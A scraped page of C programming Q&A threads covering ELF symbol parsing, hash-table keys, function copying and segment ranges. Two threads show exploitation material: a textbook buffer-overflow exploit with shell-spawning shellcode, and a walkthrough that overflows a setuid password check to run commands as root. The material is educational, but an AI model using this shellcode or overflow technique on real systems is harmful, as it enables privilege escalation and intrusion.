Elf Symtab Parsing Null Pointer - c

Hate to ask people to help me debug my code but really stuck on this. I have a simple code snippet for going through the symbols in symtab and then printing them to the console. Apparently, I have an null pointer in the calls to printf and strcmp (resulting in segfault), but I can't seem to figure out why.
Here is the code snippet:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <elf.h>
#include <fcntl.h>
#ifdef DEBUG
#define PRINTDEBUG(x) printf x //variable number of arguments
#else
#define PRINTDEBUG(x) do{} while(0)
#endif
uint32_t main(int argc, char** argv){
char* filename = argv[1];
char* sym_name = argv[2];
int fd = open(filename, O_RDONLY);
struct stat st;
stat(fd, &st);
char mem[st.st_size];
read(fd, mem, st.st_size);
Elf32_Ehdr* ehdr;
Elf32_Shdr* shdr; //generic entry for enumerating sections
Elf32_Shdr strtab; //holds string in symtab
Elf32_Shdr symtab;
char* sh_strtab; //hold sections names
Elf32_Sym* sym;
ehdr = (Elf32_Ehdr *)mem;
shdr = (Elf32_Shdr* )(mem + ehdr->e_shoff);
PRINTDEBUG(("number of section headers: %d\n", ehdr->e_shnum)); //need double brackets for variable #of arguments
sh_strtab = (char *)(mem + (shdr[ehdr->e_shstrndx].sh_offset));
//find address of symtab and strtab
for(int i = 0; i < ehdr->e_shnum; i++){
if(shdr[i].sh_size){
printf("%s\n", &sh_strtab[shdr[i].sh_name]);
if(strcmp(&sh_strtab[shdr[i].sh_name], ".strtab") == 0)
strtab = shdr[i];
if(strcmp(&sh_strtab[shdr[i].sh_name], ".symtab") == 0)
symtab = shdr[i];
}
}
PRINTDEBUG(("symtab offset %x\n", symtab.sh_offset));
PRINTDEBUG(("strtab offset %x\n", strtab.sh_offset));
char* symtab_str = (char *)(mem + strtab.sh_offset);
sym = (Elf32_Sym* )(mem + symtab.sh_offset);
printf("Symbol names: \n");
for(int i = 0; i < (symtab.sh_size / symtab.sh_entsize); i++, sym++){
printf("%x\n",&symtab_str[sym->st_name]);
if(strcmp(&symtab_str[sym->st_name], sym_name) ==0)
printf("not crahsed\n");
//TODO: resolve reloc'd syms
}
}
The null pointer occurs at &symtab_str[sym->st_name]. Weird thing is, I've looked at the assembly with the debugger and it shows &symtab_str[sym->st_name] pointing to the correct value, i.e. the first string in .strtab.
EDIT: Posted the code snippet that should trigger the segfault. Compile with "-m32" flag for gcc. Provide the pathname for a 32bit Elf file as the first run parameter. i.e.
./symtab_parse test_file
I already got this working as I originally intended. However, I am not sure about the cause of the segfault, and as pointed out by EmployedRussian, my original answer was not the root cause of the problem. Would like to really get to the bottom of this mystery, and hopefully learn something from it.

As you can see, the address stored in eax points to the first string in .strtab, so why am I getting a null pointer when passing this to strcmp?
The code snippet you showed appears to be correct, and if eax is 0xffd6a030 at the call to strcmp, then by definition it is not NULL.
Your (unsupported by evidence) assertion that it is NULL is what appears to be wrong (in other words, you are probably mis-interpreting something, and you didn't show that something).

According to this section from the ELF specs:
String table sections hold null-terminated character sequences,
commonly called strings. The object uses these strings to represent
symbol and section names. One references a string as an index into
the string table section. The first byte, which is index zero, is
defined to hold a null character.
This means that symtab_str[0] points to a null character, which when dereferenced in strcmp, resulted in a Segfault. Modifying the code to check for the null string before performing the strcmp fixed the problem.

Related

"The Shellcoder's Handbook" attack.c does not make sense

From "The Shellcoder's Handbook", victim.c is as follows
// victim.c
int main(int argc,char *argv[])
{
char little_array[512];
if (argc > 1)
strcpy(little_array,argv[1]);
}
Its exploit, attack.c is as follows
#include <stdlib.h>
#define offset_size 0
#define buffer_size 512
char sc[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; //the shellcode(Spawn shell)
unsigned long find_start(void) {
__asm__("movl %esp,%eax"); //Get ESP's value and return it.
}
int main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr; //addr_ptr: The address of the NOP sled to jump to when the program retrieves its saved EIP.
int offset=offset_size, bsize=buffer_size;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
addr = find_start() - offset;
printf("Attempting address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr += 4;
for (i = 0; i < strlen(sc); i++)
*(ptr++) = sc[i];
buff[bsize - 1] = '\0';
memcpy(buff,"BUF=",4);
putenv(buff);
system("/bin/bash");
}
ptr = buff; assigns buff's garbage value to ptr(buff is not initialized). The subsequent line, addr_ptr = (long *) ptr;, assigns ptr's value (buff's garbage value) to addr_ptr. The author's intent on these lines are not clear to me. addr_ptr is supposed to contain the address to which the program jump, preferrably the NOP sled, when it retrieves the saved EIP. However, addr_ptr contains garbage value instead.
I believe buff should be dynamically allocated, using malloc first.
I know "The Shellcoder's Handbook" has many errors, but it is one of the few books that talks about Software exploitation.
On line 26
addr = find_start() - offset;
addr is set to the target return address, so it's not really garbage.
From my understanding what the authors do is to first fill the whole buffer with addr repeatedly, so that this serves both as garbage data and as return address to overwrite the stored EIP. Additionally, doing this allows them to not care about the right offset to place the return address, provided the buffer is well DWORD aligned on the stack.
Then they overwrite the beginning of the "garbage data part" of this buffer with BUF= followed by the shellcode. This works because BUF= is of length 4, so it does not break the DWORD alignment.
Yes buff should be allocated. Note that if you check the nopattack.c in the following pages where they add the NOP sled to the exploit, then you see that it is indeed allocated on line 28:
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
Also, if you compare attack.c and nopattack.c, the codes have quite some differences (allocation, variable and function names, #define constants capitalized...) which is surprising when the latter code is supposed to be just one iteration after the former. This suggests a refactoring may have been made at some point when they wrote the book (or the second edition), and the error could come from this.

How to store keys of associative array in C implemented via hcreate/hsearch by value (not by reference)?

Using associative arrays implented via the POSIX hcreate/hsearch functions (as described here, I struggled some unexpected behaviour finding keys I've never entered or the other way around.
I tracked it down to some instance of store-by-reference-instead-of-value.
This was surprising to me, since in the example uses string literals as keys:
store("red", 0xff0000);
store("orange", 0x123456); /* Insert wrong value! */
store("green", 0x008000);
store("blue", 0x0000ff);
store("white", 0xffffff);
store("black", 0x000000);
store("orange", 0xffa500); /* Replace with correct value. */
Here is an MWE that shows my problem:
#include <inttypes.h> /* intptr_t */
#include <search.h> /* hcreate(), hsearch() */
#include <stdio.h> /* perror() */
#include <stdlib.h> /* exit() */
#include <string.h> /* strcpy() */
void exit_with_error(const char* error_message){
perror(error_message);
exit(EXIT_FAILURE);
}
int fetch(const char* key, intptr_t* value){
ENTRY e,*p;
e.key=(char*)key;
p=hsearch(e, FIND);
if(!p) return 0;
*value=(intptr_t)p->data;
return 1;
}
void store(const char *key, intptr_t value){
ENTRY e,*p;
e.key=(char*)key;
p = hsearch(e, ENTER);
if(!p) exit_with_error("hash full");
p->data = (void *)value;
}
void main(){
char a[4]="foo";
char b[4]="bar";
char c[4]="";
intptr_t x=NULL;
if(!hcreate(50)) exit_with_error("no hash");
store(a,1); /* a --> 1 */
strcpy(c,a); /* remember a */
strcpy(a,b); /* set a to b */
store(a,-1); /* b --> -1 */
strcpy(a,c); /* reset a */
if(fetch(a,&x)&&x==1) puts("a is here.");
if(!fetch(b,&x)) puts("b is not.");
strcpy(a,b); printf("But if we adjust a to match b");
if(fetch(a,&x)&&x==-1&&fetch(b,&x)&&x==-1) puts(", we find both.");
exit(EXIT_SUCCESS);
}
Compiling and executing above C code results in the following output:
a is here.
b is not.
But if we adjust a to match b, we find both.
I will need to read a file and store a a large number of string:int pairs and then I will need to read a second file to check an even larger number of strings for previously stored values.
I don't see how this would be possible if keys are compared by reference.
How can I change my associative array implementation to store keys by value?
And if that's not possible, how can I work around that problem given the above use case?
edit:
This question just deals with keys entered but not found.
The opposite problem also appears and is described in detail in this question.
edit:
It turned out that store() needs to strdup() key to fix this and another problem.
I found out that by using the same variable for storage & lookup, I can actually retrieve all the values in the array:
void main(){
char a[4]="foo";
char b[4]="bar";
char c[4]="baz";
char t[4]="";
intptr_t x=NULL;
if(!hcreate(50)) exit_with_error("no hash");
strcpy(t,a); store(t, 1); /* a --> 1 */
strcpy(t,b); store(t,-1); /* b --> -1 */
strcpy(t,c); store(t, 0); /* c --> 0 */
if(!fetch(a,&x)) puts("a is not here.");
if(!fetch(b,&x)) puts("Neither is b.");
if( fetch(c,&x)) puts("c is in (and equal to t).");
strcpy(t,a); if(fetch(t,&x)&&x== 1) puts("t can retrieve a.");
strcpy(t,b); if(fetch(t,&x)&&x==-1) puts("It also finds b.");
strcpy(t,c); if(fetch(t,&x)&&x== 0) puts("And as expected c.");
exit(EXIT_SUCCESS);
}
This results in the following output:
a is not here.
Neither is b.
c is in (and equal to t).
t can retrieve a.
It also finds b.
And as expected c.
However, I still don't understand why this is happening.
Somehow it seems the key needs to be at the same location (reference) and contain the same content (value) to be found.

Creating a basic stack overflow using IDA

This program is running with root privileges on my machine and I need to perform a Stack overflow attack on the following code and get root privileges:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <openssl/sha.h>
void sha256(char *string, char outputBuffer[65])
{
unsigned char hash[SHA256_DIGEST_LENGTH];
int i = 0;
SHA256_CTX sha256;
SHA256_Init(&sha256);
SHA256_Update(&sha256, string, strlen(string));
SHA256_Final(hash, &sha256);
for(i = 0; i < SHA256_DIGEST_LENGTH; i++)
{
sprintf(outputBuffer + (i * 2), "%02x", hash[i]);
}
outputBuffer[64] = 0;
}
int password_check(char *userpass)
{
char text[20] = "thisisasalt";
unsigned int password_match = 0;
char output[65] = { 0, };
// >>> hashlib.sha256("Hello, world!").hexdigest()
char pass[] = "315f5bdb76d078c43b8ac0064e4a0164612b1fce77c869345bfc94c75894edd3";
text[0] = 'a';
text[1] = 't';
text[2] = 'j';
text[3] = '5';
text[4] = '3';
text[5] = 'k';
text[6] = '$';
text[7] = 'g';
text[8] = 'f';
text[9] = '[';
text[10] = ']';
text[11] = '\0';
strcat(text, userpass);
sha256(text, output);
if (strcmp(output, pass) == 0)
{
password_match = 1;
}
return (password_match == 1);
}
int main(int argc, char **argv)
{
if (argc < 3)
{
printf("Usage: %s <pass> <command>\n", argv[0]);
exit(1);
}
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
if (password_check(argv[1]))
{
printf("Running command as root: %s\n", argv[2]);
setuid(0);
setgid(0);
system(argv[2]);
}
else
{
printf("Authentication failed! This activity will be logged!\n");
}
return 0;
}
So I try to analyse the program with IDA and I see the text segment going from the lower addresses to the higher addresses, higher than that I see the data and then the bss and finally external commands.
Now as far as I know the stack should be just above that, but I'm not certain how to view it, how exactly am I supposed to view the stack in order to know what I'm writing on? (Do I even need it or am I completely clueless?)
Second question is considering the length of the input, how do i get around this check in the code:
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
Can I somehow give the string to the program by reference? If so how do I do it? (Again, hoping I'm not completely clueless)
Now as far as I know the stack should be just above that, but I'm not certain how to view it, how exactly am I supposed to view the stack in order to know what I'm writing on? (Do I even need it or am I completely clueless?)
The stack location varies all the time - you need to look at the value of the ESP/RSP register, its value is the current address of the top of the stack. Typically, variable addressing will be based on EBP rather then ESP, but they both will point to the same general area of memory.
During analysis, IDA sets up a stack frame for each function, which acts much like a struct - you can define variables with types and names in it. This frame is summarized at the top of the function:
Double-clicking it or any local variable in the function body will open a more detailed window. That's as good as you can get without actually running your program in a debugger.
You can see that text is right next to password_match, and judging from the addresses, there are 0x14 bytes allocated for text, as one would expect. However, this is not guaranteed and the compiler can freely shuffle the variables around, pad them or optimize them into registers.
Second question is considering the length of the input, how do i get around this check in the code:
if (strlen((const char *) argv[1]) > 10)
{
printf("Error: pasword too long\n");
exit(1);
}
You don't need to get around this check, it's already broken enough. There's an off-by-one error.
Stop reading here if you want to figure out the overflow yourself.
The valid range of indices for text spans from text[0] through text[19]. In the code, user input is written to the memory area starting at text[11]. The maximum input length allowed by the strlen check is 10 symbols + the NULL terminator. Unfortunately, that means text[19] contains the 9th user-entered symbol, and the 10th symbol + the terminator overflow into adjacent memory space. Under certain circumstances, that allows you to overwrite the least significant byte of password_match with an arbitrary value, and the second least significant byte with a 0. Your function accepts the password if password_match equals 1, which means the 10th character in your password needs to be '\x01' (note that this is not the same character as '1').
Here are two screenshots from IDA running as a debugger. text is highlighted in yellow, password_match is in green.
The password I entered was 123456789\x01.
Stack before user entered password is strcat'd into text.
Stack after strcat. Notice that password_match changed.

Copy a function in memory and execute it

I would like to know how in C in can copy the content of a function into memory and the execute it?
I'm trying to do something like this:
typedef void(*FUN)(int *);
char * myNewFunc;
char *allocExecutablePages (int pages)
{
template = (char *) valloc (getpagesize () * pages);
if (mprotect (template, getpagesize (),
PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
}
void f1 (int *v) {
*v = 10;
}
// allocate enough spcae but how much ??
myNewFunc = allocExecutablePages(...)
/* Copy f1 somewere else
* (how? assume that i know the size of f1 having done a (nm -S foo.o))
*/
((FUN)template)(&val);
printf("%i",val);
Thanks for your answers
You seem to have figured out the part about protection flags. If you know the size of the function, now you can just do memcpy() and pass the address of f1 as the source address.
One big caveat is that, on many platforms, you will not be able to call any other functions from the one you're copying (f1), because relative addresses are hardcoded into the binary code of the function, and moving it into a different location it the memory can make those relative addresses turn bad.
This happens to work because function1 and function2 are exactly the same size in memory.
We need the length of function2 for our memcopy so what should be done is:
int diff = (&main - &function2);
You'll notice you can edit function 2 to your liking and it keeps working just fine!
Btw neat trick. Unfurtunate the g++ compiler does spit out invalid conversion from void* to int... But indeed with gcc it compiles perfectly ;)
Modified sources:
//Hacky solution and simple proof of concept that works for me (and compiles without warning on Mac OS X/GCC 4.2.1):
//fixed the diff address to also work when function2 is variable size
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include <sys/mman.h>
int function1(int x){
return x-5;
}
int function2(int x){
//printf("hello world");
int k=32;
int l=40;
return x+5+k+l;
}
int main(){
int diff = (&main - &function2);
printf("pagesize: %d, diff: %d\n",getpagesize(),diff);
int (*fptr)(int);
void *memfun = malloc(4096);
if (mprotect(memfun, 4096, PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
memcpy(memfun, (const void*)&function2, diff);
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
fptr = memfun;
printf("memory: %d\n",(*fptr)(6) );
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
free(memfun);
return 0;
}
Output:
Walter-Schrepperss-MacBook-Pro:cppWork wschrep$ gcc memoryFun.c
Walter-Schrepperss-MacBook-Pro:cppWork wschrep$ ./a.out
pagesize: 4096, diff: 35
native: 1
memory: 83
native: 1
Another to note is calling printf will segfault because printf is most likely not found due to relative address going wrong...
Hacky solution and simple proof of concept that works for me (and compiles without warning on Mac OS X/GCC 4.2.1):
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include <sys/mman.h>
int function1(int x){
return x-5;
}
int function2(int x){
return x+5;
}
int main(){
int diff = (&function2 - &function1);
printf("pagesize: %d, diff: %d\n",getpagesize(),diff);
int (*fptr)(int);
void *memfun = malloc(4096);
if (mprotect(memfun, 4096, PROT_READ|PROT_EXEC|PROT_WRITE) == -1) {
perror ("mprotect");
}
memcpy(memfun, (const void*)&function2, diff);
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
fptr = memfun;
printf("memory: %d\n",(*fptr)(6) );
fptr = &function1;
printf("native: %d\n",(*fptr)(6));
free(memfun);
return 0;
}
I have tried this issue many times in C and came to the conclusion that it cannot be accomplished using only the C language. My main thorn was finding the length of the function to copy.
The Standard C language does not provide any methods to obtain the length of a function. However, one can use assembly language and "sections" to find the length. Once the length is found, copying and executing is easy.
The easiest solution is to create or define a linker segment that contains the function. Write an assembly language module to calculate and publicly declare the length of this segment. Use this constant for the size of the function.
There are other methods that involve setting up the linker, such as predefined areas or fixed locations and copying those locations.
In embedded systems land, most of the code that copies executable stuff into RAM is written in assembly.
This might be a hack solution here. Could you make a dummy variable or function directly after the function (to be copied), obtain that dummy variable's/function's address and then take the functions address to do sum sort of arithmetic using addresses to obtain the function size? This might be possible since memory is allocated linearly and orderly (rather than randomly). This would also keep function copying within a ANSI C portable nature rather than delving into system specific assembly code. I find C to be rather flexible, one just needs to think things out.

Finding the address range of the data segment

As a programming exercise, I am writing a mark-and-sweep garbage collector in C. I wish to scan the data segment (globals, etc.) for pointers to allocated memory, but I don't know how to get the range of the addresses of this segment. How could I do this?
If you're working on Windows, then there are Windows API that would help you.
//store the base address the loaded Module
dllImageBase = (char*)hModule; //suppose hModule is the handle to the loaded Module (.exe or .dll)
//get the address of NT Header
IMAGE_NT_HEADERS *pNtHdr = ImageNtHeader(hModule);
//after Nt headers comes the table of section, so get the addess of section table
IMAGE_SECTION_HEADER *pSectionHdr = (IMAGE_SECTION_HEADER *) (pNtHdr + 1);
ImageSectionInfo *pSectionInfo = NULL;
//iterate through the list of all sections, and check the section name in the if conditon. etc
for ( int i = 0 ; i < pNtHdr->FileHeader.NumberOfSections ; i++ )
{
char *name = (char*) pSectionHdr->Name;
if ( memcmp(name, ".data", 5) == 0 )
{
pSectionInfo = new ImageSectionInfo(".data");
pSectionInfo->SectionAddress = dllImageBase + pSectionHdr->VirtualAddress;
**//range of the data segment - something you're looking for**
pSectionInfo->SectionSize = pSectionHdr->Misc.VirtualSize;
break;
}
pSectionHdr++;
}
Define ImageSectionInfo as,
struct ImageSectionInfo
{
char SectionName[IMAGE_SIZEOF_SHORT_NAME];//the macro is defined WinNT.h
char *SectionAddress;
int SectionSize;
ImageSectionInfo(const char* name)
{
strcpy(SectioName, name);
}
};
Here's a complete, minimal WIN32 console program you can run in Visual Studio that demonstrates the use of the Windows API:
#include <stdio.h>
#include <Windows.h>
#include <DbgHelp.h>
#pragma comment( lib, "dbghelp.lib" )
void print_PE_section_info(HANDLE hModule) // hModule is the handle to a loaded Module (.exe or .dll)
{
// get the location of the module's IMAGE_NT_HEADERS structure
IMAGE_NT_HEADERS *pNtHdr = ImageNtHeader(hModule);
// section table immediately follows the IMAGE_NT_HEADERS
IMAGE_SECTION_HEADER *pSectionHdr = (IMAGE_SECTION_HEADER *)(pNtHdr + 1);
const char* imageBase = (const char*)hModule;
char scnName[sizeof(pSectionHdr->Name) + 1];
scnName[sizeof(scnName) - 1] = '\0'; // enforce nul-termination for scn names that are the whole length of pSectionHdr->Name[]
for (int scn = 0; scn < pNtHdr->FileHeader.NumberOfSections; ++scn)
{
// Note: pSectionHdr->Name[] is 8 bytes long. If the scn name is 8 bytes long, ->Name[] will
// not be nul-terminated. For this reason, copy it to a local buffer that's nul-terminated
// to be sure we only print the real scn name, and no extra garbage beyond it.
strncpy(scnName, (const char*)pSectionHdr->Name, sizeof(pSectionHdr->Name));
printf(" Section %3d: %p...%p %-10s (%u bytes)\n",
scn,
imageBase + pSectionHdr->VirtualAddress,
imageBase + pSectionHdr->VirtualAddress + pSectionHdr->Misc.VirtualSize - 1,
scnName,
pSectionHdr->Misc.VirtualSize);
++pSectionHdr;
}
}
// For demo purpopses, create an extra constant data section whose name is exactly 8 bytes long (the max)
#pragma const_seg(".t_const") // begin allocating const data in a new section whose name is 8 bytes long (the max)
const char const_string1[] = "This string is allocated in a special const data segment named \".t_const\".";
#pragma const_seg() // resume allocating const data in the normal .rdata section
int main(int argc, const char* argv[])
{
print_PE_section_info(GetModuleHandle(NULL)); // print section info for "this process's .exe file" (NULL)
}
This page may be helpful if you're interested in additional uses of the DbgHelp library.
You can read the PE image format here, to know it in details. Once you understand the PE format, you'll be able to work with the above code, and can even modify it to meet your need.
PE Format
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
An In-Depth Look into the Win32 Portable Executable File Format, Part 1
An In-Depth Look into the Win32 Portable Executable File Format, Part 2
Windows API and Structures
IMAGE_SECTION_HEADER Structure
ImageNtHeader Function
IMAGE_NT_HEADERS Structure
I think this would help you to great extent, and the rest you can research yourself :-)
By the way, you can also see this thread, as all of these are somehow related to this:
Scenario: Global variables in DLL which is used by Multi-threaded Application
The bounds for text (program code) and data for linux (and other unixes):
#include <stdio.h>
#include <stdlib.h>
/* these are in no header file, and on some
systems they have a _ prepended
These symbols have to be typed to keep the compiler happy
Also check out brk() and sbrk() for information
about heap */
extern char etext, edata, end;
int
main(int argc, char **argv)
{
printf("First address beyond:\n");
printf(" program text segment(etext) %10p\n", &etext);
printf(" initialized data segment(edata) %10p\n", &edata);
printf(" uninitialized data segment (end) %10p\n", &end);
return EXIT_SUCCESS;
}
Where those symbols come from: Where are the symbols etext ,edata and end defined?
Since you'll probably have to make your garbage collector the environment in which the program runs, you can get it from the elf file directly.
Load the file that the executable came from and parse the PE headers, for Win32. I've no idea about on other OSes. Remember that if your program consists of multiple files (e.g. DLLs) you may have multiple data segments.
For iOS you can use this solution. It shows how to find the text segment range but you can easily change it to find any segment you like.

Resources